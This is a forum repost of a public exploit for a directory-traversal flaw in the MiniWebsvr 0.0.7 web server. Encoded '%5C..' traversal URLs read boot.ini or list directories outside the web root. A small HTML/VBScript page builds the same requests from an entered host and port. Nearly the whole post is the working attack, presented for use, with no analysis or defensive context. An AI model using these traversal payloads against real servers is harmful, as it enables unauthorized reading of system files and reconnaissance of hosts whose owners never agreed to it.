发新话题
打印

MiniWebsvr 0.0.7 Remote Directory Transversal Exploit

MiniWebsvr 0.0.7 Remote Directory Transversal Exploit

复制内容到剪贴板
代码:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: [url]http://miniwebsvr.sourceforge.net/[/url]
author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

[url]http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini[/url] or
[url]http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../[/url]
-------------------------------------------------------------

Host      Port
<input type=text name=txtIP value = "localhost">  <input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language=&#39;vbscript&#39;>
Sub GetBoot
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>

TOP

发新话题